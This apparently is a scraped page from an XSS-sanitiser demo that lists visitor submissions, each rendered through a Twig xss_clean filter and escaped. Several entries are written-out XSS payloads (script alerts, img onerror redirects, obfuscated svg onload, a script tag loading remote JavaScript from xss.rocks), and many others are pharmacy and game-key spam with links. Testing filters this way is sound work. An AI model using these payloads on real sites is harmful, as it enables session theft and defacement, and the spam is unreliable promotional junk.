          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          
          result with twig: {{ xss.xss | escape }}:
          <script>eisa
          keyword(s): 
          description: 
          by  | at 2020-10-15 11:39:34
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          eisa
          result with twig: {{ xss.xss | escape }}:
          <b>eisa</b>
          keyword(s): 
          description: 
          by <b>eisa</b> | at 2020-10-15 11:38:34
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          
          result with twig: {{ xss.xss | escape }}:
          <script>alert(1)</script>
          keyword(s): 
          description: 
          by 1 | at 2020-10-15 06:22:20
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          
          result with twig: {{ xss.xss | escape }}:
          <img src=x onerror=alert(`ABC!`);window.location=`https://google.co.uk`;>
          keyword(s): 
          description: 
          by author | at 2020-10-13 14:20:20
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          asdadsada
          result with twig: {{ xss.xss | escape }}:
          asdadsada
          keyword(s): 
          description: 
          by <img > | at 2020-10-13 14:19:51
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          dasds
          result with twig: {{ xss.xss | escape }}:
          dasds
          keyword(s): dsa
          description: aasd
          by LSldaldadada | at 2020-10-11 06:58:12
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          test
          result with twig: {{ xss.xss | escape }}:
          test
          keyword(s): test
          description: test
          by test | at 2020-10-09 22:26:38
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          contact">
          result with twig: {{ xss.xss | escape }}:
          contact"><img src=x onerror=alert(`XSS!`);window.location=`https://google.co.uk`;>
          keyword(s): sdsd
          description: sdssds
          by sdsd | at 2020-10-07 17:03:35
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          
          result with twig: {{ xss.xss | escape }}:
          <script>alert(1)</script>
          keyword(s): 
          description: 
          by " ="alert(1) | at 2020-10-04 10:50:36
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          
<style>Hello</style>
          result with twig: {{ xss.xss | escape }}:
          <div class="nope"></div><style>Hello</style>
          keyword(s): 
          description: 
          by  | at 2020-10-03 09:39:56
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          result with twig: {{ xss.xss | escape }}:
          {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          keyword(s): asd
          description: asd
          by asd | at 2020-10-02 13:59:21
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          Купить игры +на xbox +one и получить накопительные скидки  + https://plati.market/itm/nba-2k19-xbox-one/2898599 
Ключи игр xbox +one купить недорого Assassin's Creed Odyssey И В ПОДАРОК АБСОЛЮТНО БЕСПЛАТНО Assassin's Creed UNITY  + https://vk.com/public195417980
          result with twig: {{ xss.xss | escape }}:
          Купить игры +на xbox +one и получить накопительные скидки  + https://plati.market/itm/nba-2k19-xbox-one/2898599 
Ключи игр xbox +one купить недорого Assassin's Creed Odyssey И В ПОДАРОК АБСОЛЮТНО БЕСПЛАТНО Assassin's Creed UNITY  + https://vk.com/public195417980
          keyword(s): 
          description: Купить игры +на xbox +one и получить накопительные скидки  + https://plati.market/itm/nba-2k19-xbox-one/2898599 
Ключи игр xbox +one купить недорого Assassin's Creed Odyssey И В ПОДАРОК АБСОЛЮТНО БЕСПЛАТНО Assassin's Creed UNITY  + https://vk.com/public195417980
          by mmmaxim | at 2020-10-02 08:35:38
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          I'd like to apply for this job http://dboudeau.fr/site/?page_id=772 buy rythmol  "I have made many mistakes in my life, none greater than this one," he said in a written statement Wednesday. "I have lost my job, my reputation and damaged the legacy I had worked 10 years to nurture and grow. I will learn from this and move on to the next chapter in my life."
 
          result with twig: {{ xss.xss | escape }}:
          I'd like to apply for this job http://dboudeau.fr/site/?page_id=772 buy rythmol  "I have made many mistakes in my life, none greater than this one," he said in a written statement Wednesday. "I have lost my job, my reputation and damaged the legacy I had worked 10 years to nurture and grow. I will learn from this and move on to the next chapter in my life."
 
          keyword(s): HrCJZp
          description: I'd like to apply for this job http://dboudeau.fr/site/?page_id=772 buy rythmol  "I have made many mistakes in my life, none greater than this one," he said in a written statement Wednesday. "I have lost my job, my reputation and damaged the legacy I had worked 10 years to nurture and grow. I will learn from this and move on to the next chapter in my life."
 
          by Rolando | at 2020-10-02 04:30:26
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          Your cash is being counted http://www.onnam.es.kr/_class/comment/list/onnam-e/2020/G02020504/276290/6351004 buy evista  âHe asks great questions, and so when you have a player like that who wants to learn it, who wants to put himself in a position to help the team and to put himself in the position to be successful, physically if he can do it, heâs going to do it,â adds receivers coach Kevin M. Gilbride. âHeâs giving himself every opportunity to make an impact.â
 
          result with twig: {{ xss.xss | escape }}:
          Your cash is being counted http://www.onnam.es.kr/_class/comment/list/onnam-e/2020/G02020504/276290/6351004 buy evista  âHe asks great questions, and so when you have a player like that who wants to learn it, who wants to put himself in a position to help the team and to put himself in the position to be successful, physically if he can do it, heâs going to do it,â adds receivers coach Kevin M. Gilbride. âHeâs giving himself every opportunity to make an impact.â
 
          keyword(s): Dummua
          description: Your cash is being counted http://www.onnam.es.kr/_class/comment/list/onnam-e/2020/G02020504/276290/6351004 buy evista  âHe asks great questions, and so when you have a player like that who wants to learn it, who wants to put himself in a position to help the team and to put himself in the position to be successful, physically if he can do it, heâs going to do it,â adds receivers coach Kevin M. Gilbride. âHeâs giving himself every opportunity to make an impact.â
 
          by Jamel | at 2020-10-02 04:00:23
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          How much were you paid in your last job? http://sykkelsor.no/2018/04/26/santa-cruz-chameleon/ buy lithobid  ZURICH, July 15 (Reuters) - Buying Alexion PharmaceuticalsInc would help Roche make a splash in thenewly lucrative area of rare or so-called orphan diseases, butit could command a price that the Swiss drugmaker is ultimatelynot willing to pay.
 
          result with twig: {{ xss.xss | escape }}:
          How much were you paid in your last job? http://sykkelsor.no/2018/04/26/santa-cruz-chameleon/ buy lithobid  ZURICH, July 15 (Reuters) - Buying Alexion PharmaceuticalsInc would help Roche make a splash in thenewly lucrative area of rare or so-called orphan diseases, butit could command a price that the Swiss drugmaker is ultimatelynot willing to pay.
 
          keyword(s): DWNqst
          description: How much were you paid in your last job? http://sykkelsor.no/2018/04/26/santa-cruz-chameleon/ buy lithobid  ZURICH, July 15 (Reuters) - Buying Alexion PharmaceuticalsInc would help Roche make a splash in thenewly lucrative area of rare or so-called orphan diseases, butit could command a price that the Swiss drugmaker is ultimatelynot willing to pay.
 
          by Joshua | at 2020-10-01 06:25:53
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          What do you do for a living? http://share-share.jp/wpb/?p=16020 buy womenra  He said big food companies "should not be adding to that $17million" in Washington state, whose population is less thanone-fifth of California's. Behar spoke on Wednesday on aconference call with environmentalists who support the proposedfood-labeling law.
 
          result with twig: {{ xss.xss | escape }}:
          What do you do for a living? http://share-share.jp/wpb/?p=16020 buy womenra  He said big food companies "should not be adding to that $17million" in Washington state, whose population is less thanone-fifth of California's. Behar spoke on Wednesday on aconference call with environmentalists who support the proposedfood-labeling law.
 
          keyword(s): rtHb7
          description: What do you do for a living? http://share-share.jp/wpb/?p=16020 buy womenra  He said big food companies "should not be adding to that $17million" in Washington state, whose population is less thanone-fifth of California's. Behar spoke on Wednesday on aconference call with environmentalists who support the proposedfood-labeling law.
 
          by Layla | at 2020-09-30 17:39:22
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          I enjoy travelling http://e-lib.jangan.ac.kr/ebook/ebook_detail.asp?goods_id=480gtp0016650 buy ursodeoxycholic  The SEC's crowdfunding plan is a requirement in theJumpstart Our Business Startups (JOBS) Act, a 2012 law enactedwith wide bipartisan support that relaxes federal regulations tohelp spur small business growth.
 
          result with twig: {{ xss.xss | escape }}:
          I enjoy travelling http://e-lib.jangan.ac.kr/ebook/ebook_detail.asp?goods_id=480gtp0016650 buy ursodeoxycholic  The SEC's crowdfunding plan is a requirement in theJumpstart Our Business Startups (JOBS) Act, a 2012 law enactedwith wide bipartisan support that relaxes federal regulations tohelp spur small business growth.
 
          keyword(s): 6Uewg
          description: I enjoy travelling http://e-lib.jangan.ac.kr/ebook/ebook_detail.asp?goods_id=480gtp0016650 buy ursodeoxycholic  The SEC's crowdfunding plan is a requirement in theJumpstart Our Business Startups (JOBS) Act, a 2012 law enactedwith wide bipartisan support that relaxes federal regulations tohelp spur small business growth.
 
          by Dominique | at 2020-09-30 02:53:59
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          Could I have an application form? http://trexesports.com/pubg-mobile-india-series-2019 buy monoket  The 2012/13 Premier League season is behind us and summers are difficult when you're a football fan. But as transfers start to happen and squads begin to return for pre-season training, the blood pressure of loyal supporters across the country slowly begins to rise once again. That means it's time to choose your fantasy football team. Here are five tips for bargain buys that will help you when selecting your squad.
 
          result with twig: {{ xss.xss | escape }}:
          Could I have an application form? http://trexesports.com/pubg-mobile-india-series-2019 buy monoket  The 2012/13 Premier League season is behind us and summers are difficult when you're a football fan. But as transfers start to happen and squads begin to return for pre-season training, the blood pressure of loyal supporters across the country slowly begins to rise once again. That means it's time to choose your fantasy football team. Here are five tips for bargain buys that will help you when selecting your squad.
 
          keyword(s): WxkBF
          description: Could I have an application form? http://trexesports.com/pubg-mobile-india-series-2019 buy monoket  The 2012/13 Premier League season is behind us and summers are difficult when you're a football fan. But as transfers start to happen and squads begin to return for pre-season training, the blood pressure of loyal supporters across the country slowly begins to rise once again. That means it's time to choose your fantasy football team. Here are five tips for bargain buys that will help you when selecting your squad.
 
          by Brianna | at 2020-09-29 23:29:21
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          I really like swimming http://doanhnghiepthuonghieu.vn/huong-maria-machoro-doanh-nhan-tam-sac-dang-cap-nang-tam.html buy clindamycin  After exploding in the atmosphere with the force of 30 atomic bombs, the Chelyabinsk meteor of February 15 left a trail of dust that circled the globe and lingered in the atmosphere for at least three months NASA has learned.
 
          result with twig: {{ xss.xss | escape }}:
          I really like swimming http://doanhnghiepthuonghieu.vn/huong-maria-machoro-doanh-nhan-tam-sac-dang-cap-nang-tam.html buy clindamycin  After exploding in the atmosphere with the force of 30 atomic bombs, the Chelyabinsk meteor of February 15 left a trail of dust that circled the globe and lingered in the atmosphere for at least three months NASA has learned.
 
          keyword(s): XoBzgG
          description: I really like swimming http://doanhnghiepthuonghieu.vn/huong-maria-machoro-doanh-nhan-tam-sac-dang-cap-nang-tam.html buy clindamycin  After exploding in the atmosphere with the force of 30 atomic bombs, the Chelyabinsk meteor of February 15 left a trail of dust that circled the globe and lingered in the atmosphere for at least three months NASA has learned.
 
          by Emery | at 2020-09-29 22:53:53
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          Is this a temporary or permanent position? http://blog.sbolshakov.ru/bgp-blackhole/ buy azithromycin  While the NDRC has always had a price-setting role, itsdecision to launch high profile predatory pricing probes intoinfant formula and drugs now could be a bid by the commission toprove its usefulness as a regulator.
 
          result with twig: {{ xss.xss | escape }}:
          Is this a temporary or permanent position? http://blog.sbolshakov.ru/bgp-blackhole/ buy azithromycin  While the NDRC has always had a price-setting role, itsdecision to launch high profile predatory pricing probes intoinfant formula and drugs now could be a bid by the commission toprove its usefulness as a regulator.
 
          keyword(s): MXfNA
          description: Is this a temporary or permanent position? http://blog.sbolshakov.ru/bgp-blackhole/ buy azithromycin  While the NDRC has always had a price-setting role, itsdecision to launch high profile predatory pricing probes intoinfant formula and drugs now could be a bid by the commission toprove its usefulness as a regulator.
 
          by Thaddeus | at 2020-09-29 20:06:55
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          Yes, I love it! http://proud-consulting.com/itil-new-vesrsion buy adalat  I grew up rooting for the Giants and still root for the Giants and especially root for this coach and this quarterback, because of the run they have given all of us over the past five or six years. They have given us too much, way too much, to give up on them after six games like this, every one of them winnable except the game in Carolina.
 
          result with twig: {{ xss.xss | escape }}:
          Yes, I love it! http://proud-consulting.com/itil-new-vesrsion buy adalat  I grew up rooting for the Giants and still root for the Giants and especially root for this coach and this quarterback, because of the run they have given all of us over the past five or six years. They have given us too much, way too much, to give up on them after six games like this, every one of them winnable except the game in Carolina.
 
          keyword(s): qVebi
          description: Yes, I love it! http://proud-consulting.com/itil-new-vesrsion buy adalat  I grew up rooting for the Giants and still root for the Giants and especially root for this coach and this quarterback, because of the run they have given all of us over the past five or six years. They have given us too much, way too much, to give up on them after six games like this, every one of them winnable except the game in Carolina.
 
          by Lonny | at 2020-09-29 19:52:02
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          <svg/>
          result with twig: {{ xss.xss | escape }}:
          <svg/onload=eval("ale"+"rt")(`✓${alert`✓`}`)>
          keyword(s): sds
          description: s
          by dsd | at 2020-09-26 08:55:27
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          _Y000!_
          result with twig: {{ xss.xss | escape }}:
          <h1 onmouseover=alert()>_Y000!_</h1>
          keyword(s): ds
          description: ss
          by ds | at 2020-09-26 08:53:08
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          _Y000!_
          result with twig: {{ xss.xss | escape }}:
          <h1>_Y000!_</h1>
          keyword(s): sds
          description: dsdads
          by dsd | at 2020-09-26 08:52:22
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          a<svg/>c
          result with twig: {{ xss.xss | escape }}:
          a<svg/>c
          keyword(s): Sfa<svg/>c
          description: a<a />c
          by Sa<svg/>c | at 2020-09-23 12:31:25
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          d
          result with twig: {{ xss.xss | escape }}:
          <a href="xd.pl">d</a>
          keyword(s): aa
          description: a
          by a | at 2020-09-23 08:26:32
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          c
          result with twig: {{ xss.xss | escape }}:
          c
          keyword(s): a
          description: v
          by a | at 2020-09-23 08:26:04
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          hi there
here is the your quote on the Country targeted organic website traffic:

https://hyperlabs.co/quote/

thanks and regards
Mike
Hyperlabs LTF


          result with twig: {{ xss.xss | escape }}:
          hi there
here is the your quote on the Country targeted organic website traffic:

https://hyperlabs.co/quote/

thanks and regards
Mike
Hyperlabs LTF


          keyword(s): 
          description: hi there
here is the your quote on the Country targeted organic website traffic:

https://hyperlabs.co/quote/

thanks and regards
Mike
Hyperlabs LTF


          by Lucy Merrick | at 2020-09-23 01:28:18
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          
          result with twig: {{ xss.xss | escape }}:
          <SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>
          keyword(s): 
          description: 
          by asd | at 2020-09-21 10:33:38
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          asdasd
          result with twig: {{ xss.xss | escape }}:
          asdasd
          keyword(s): 
          description: 
          by asdasd | at 2020-09-21 10:33:07
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          asdasd
          result with twig: {{ xss.xss | escape }}:
          asdasd
          keyword(s): b
          description: c
          by a | at 2020-09-17 19:09:53
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          
          result with twig: {{ xss.xss | escape }}:
          <script>oi</script>
          keyword(s): 123
          description: mundo
          by deni | at 2020-09-16 04:23:59
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          mundo
          result with twig: {{ xss.xss | escape }}:
          <script>oi</script>mundo
          keyword(s): 123
          description: mundo
          by deni | at 2020-09-16 04:23:34
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          $#$a#
          result with twig: {{ xss.xss | escape }}:
          $#$a#
          keyword(s): 123
          description: $#$a#
          by deni | at 2020-09-16 04:22:30
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          asas
          result with twig: {{ xss.xss | escape }}:
          asas
          keyword(s): 123
          description: asas
          by deni | at 2020-09-16 04:21:58
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          123
          result with twig: {{ xss.xss | escape }}:
          123
          keyword(s): 123
          description: 
          by deni | at 2020-09-16 02:51:38
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          
          result with twig: {{ xss.xss | escape }}:
          <script>alert('Help me');</script>
          keyword(s): 1234
          description: hello man
          by Denilson | at 2020-09-16 02:49:19
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          

          result with twig: {{ xss.xss | escape }}:
          <script>alert('XSS');</script>

          keyword(s): 
          description: 

          by  | at 2020-09-15 19:59:38
        
      
    
  




  
    BY LARS MOELLEKEN WITH HATE IN 2015